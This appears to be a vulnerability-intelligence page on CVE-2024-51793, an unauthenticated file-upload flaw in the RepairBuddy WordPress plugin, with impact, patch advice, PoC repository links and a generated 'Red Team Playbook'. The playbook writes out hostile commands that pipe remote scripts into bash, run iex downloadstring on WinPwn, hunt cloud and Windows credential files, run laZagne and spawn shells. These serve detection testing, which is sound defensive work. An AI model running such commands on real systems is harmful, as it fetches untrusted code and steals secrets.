CVE-2024-51793
Overview
The vulnerability is an unrestricted file upload flaw classified under CWE-434, allowing malicious files to be uploaded without proper validation. The root cause lies in insufficient server-side checks on file types and extensions within the file upload functionality of the RepairBuddy plugin. This flaw affects the component responsible for handling user-submitted file uploads in the RepairBuddy WordPress plugin versions up to 3.8115.
Vulnerability Description
Unrestricted Upload of File with Dangerous Type vulnerability in Ateeq Rafeeq RepairBuddy computer-repair-shop allows Upload a Web Shell to a Web Server.This issue affects RepairBuddy: from n/a through <= 3.8115.
Impact
An unauthenticated attacker can upload and execute arbitrary web shells on the affected server, resulting in full system compromise. This enables remote code execution, data theft, and potential lateral movement within the network. The vulnerability requires no user interaction or privileges, allowing attackers to gain persistent unauthorized access and control over the web server hosting the RepairBuddy plugin.
Solution
Users should upgrade the RepairBuddy plugin to version 3.8116 or later where this vulnerability is patched. The vendor's advisory on Patchstack (https://patchstack.com/database/Wordpress/Plugin/computer-repair-shop/vulnerability/wordpress-repairbuddy-plugin-3-8115-arbitrary-file-upload-vulnerability?_s_id=cve) provides detailed patch instructions. Applying the update will enforce proper file validation and prevent dangerous file uploads.
EPSS vs KEV Prediction — Evolution (30 days)
Overview
Analysis generation failed
Threat Summary
Analysis generation failed
Full Analysis
The vulnerability associated with the unrestricted upload of files with dangerous types in the RepairBuddy application poses a significant risk to web servers running this software. This flaw allows an attacker to upload malicious files, such as web shells, which can be executed on the server. The underlying issue stems from inadequate validation and sanitization of user-uploaded files, enabling an attacker to bypass security measures and execute arbitrary code on the server. Such vulnerabilities are particularly dangerous as they can lead to full server compromise, data breaches, and unauthorized access to sensitive information.
Exploitation of this vulnerability can occur through various attack vectors. An attacker might craft a malicious file, such as a PHP web shell, and upload it through the application's file upload functionality. Once the file is successfully uploaded, the attacker can access it via a web browser, allowing them to execute commands on the server. This exploitation can be further facilitated by social engineering tactics, where an attacker might trick users into uploading the malicious file under the guise of a legitimate upload. Additionally, if the application is poorly configured, the attacker may not even need to authenticate, significantly lowering the barrier to entry for exploitation.
The real-world impact of this vulnerability can be severe, particularly for businesses relying on the RepairBuddy application for their operations. Successful exploitation can lead to unauthorized access to sensitive customer data, including personal information and payment details. This not only poses a risk to the affected business but also to its customers, potentially resulting in identity theft and financial fraud. Furthermore, the reputational damage that can arise from a data breach can lead to loss of customer trust, regulatory fines, and legal liabilities. The financial implications of such incidents can be substantial, with costs associated with incident response, remediation, and potential lawsuits.
To detect and mitigate this vulnerability, organizations should implement several strategies. First, it is crucial to enforce strict file type validation and sanitization on all uploaded files. This includes checking the file extension and MIME type, as well as scanning files for known malicious signatures. Additionally, employing a web application firewall (WAF) can help detect and block malicious upload attempts in real-time. Regular security audits and vulnerability assessments should also be conducted to identify and remediate any weaknesses in the application. Furthermore, keeping the RepairBuddy application and its dependencies up to date is essential to ensure that any known vulnerabilities are patched promptly.
In conclusion, the unrestricted upload of files with dangerous types in the RepairBuddy application represents a critical security vulnerability that can lead to severe consequences for organizations. By understanding the technical details, potential attack vectors, and real-world implications of this vulnerability, businesses can take proactive measures to protect their systems. Implementing robust detection and mitigation strategies will not only safeguard sensitive data but also enhance the overall security posture of the organization, fostering trust among customers and stakeholders alike.
CSURFACE threat intelligence has identified a marked escalation in the exploit landscape for CVE-2024-51793, with multiple new public proof-of-concept codes now available on GitHub. This development significantly lowers the barrier to entry for threat actors seeking to leverage the unrestricted file upload vulnerability in the RepairBuddy plugin. Our telemetry indicates that the EPSS score has risen sharply to a high percentile, reflecting an increased likelihood of exploitation in the wild. The elevation of the CVSS score to the maximum critical rating underscores the severity and ease of exploitation, particularly given the unauthenticated nature of the vulnerability and its capability to enable remote code execution. For defenders, this shift signals an urgent need to reassess exposure and prioritize detection efforts, as the availability of zero-click exploits amplifies the risk of rapid compromise. Consequently, the threat level associated with CVE-2024-51793 has escalated to critical, with a heightened probability of active exploitation campaigns targeting vulnerable RepairBuddy installations.
Update 2 — June 09, 2026
The recent adjustment of the CVSS score from 10.0 to 9.8 for CVE-2024-51793 reflects a refined understanding of the vulnerability’s impact rather than a diminished threat. CSURFACE threat intelligence notes that this recalibration aligns with standardized scoring criteria but does not reduce the critical nature of the flaw. Our telemetry continues to show stable exploit development activity, with multiple new proof-of-concept exploits publicly available, including unauthenticated zero-click remote code execution methods. This persistent availability of sophisticated exploit code maintains a high risk of rapid compromise for unpatched RepairBuddy installations. While the EPSS score remains elevated and stable, indicating ongoing exploitation potential, the slight CVSS score adjustment should not lead to complacency. Instead, it underscores the necessity for defenders to maintain heightened vigilance given the vulnerability’s ease of exploitation and the active presence of weaponized code in the wild. The threat level remains critical, with no indication of abatement in attacker interest or capability targeting this vector.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Webfulcreations | Computer Repair Shop | All |
cpe:2.3:a:webfulcreations:computer_repair_shop:*:*:*:*:*:wordpress:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (4)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
KTN1990/CVE-2024-51793
(CVE-2024-51793) Wordpress Plugin: Computer Repair Shop <= 3.8115 - Unauthenticated Arbitrary File Upload
|
KTN1990 | 1 | 1 | 2025-05-15 | View |
|
Nxploited/CVE-2024-51793
WordPress RepairBuddy plugin <= 3.8115 - Arbitrary File Upload vulnerability
|
Nxploited | 1 | 0 | 2025-03-24 | View |
|
JoshuaProvoste/0-click-RCE-Exploit-for-CVE-2024-51793
Unauthenticated 0-click RCE exploit for CVE-2024-51793. Exploits an arbitrary file upload vulnerability via admin-ajax.p...
|
JoshuaProvoste | 1 | 0 | 2026-01-22 | View |
|
0axz-tools/CVE-2024-51793
|
0axz-tools | 0 | 0 | 2025-10-17 | View |
Threat Feed
3 eventsSighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-1 | Accessing Functionality Not Properly Constrained by ACLs |
30%
|
High | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-51793 |
| patchstack.com |
GitHub CVE
vdb-entry
|
https://patchstack.com/database/Wordpress/Plugin/computer-repair-shop/vulnerability/wordpress-repairbuddy-plugin-3-8115-arbitrary-file-upload-vulnerability?_s_id=cve |
| github.com |
NVD API
|
https://github.com/JoshuaProvoste/0-click-RCE-Exploit-for-CVE-2024-51793 |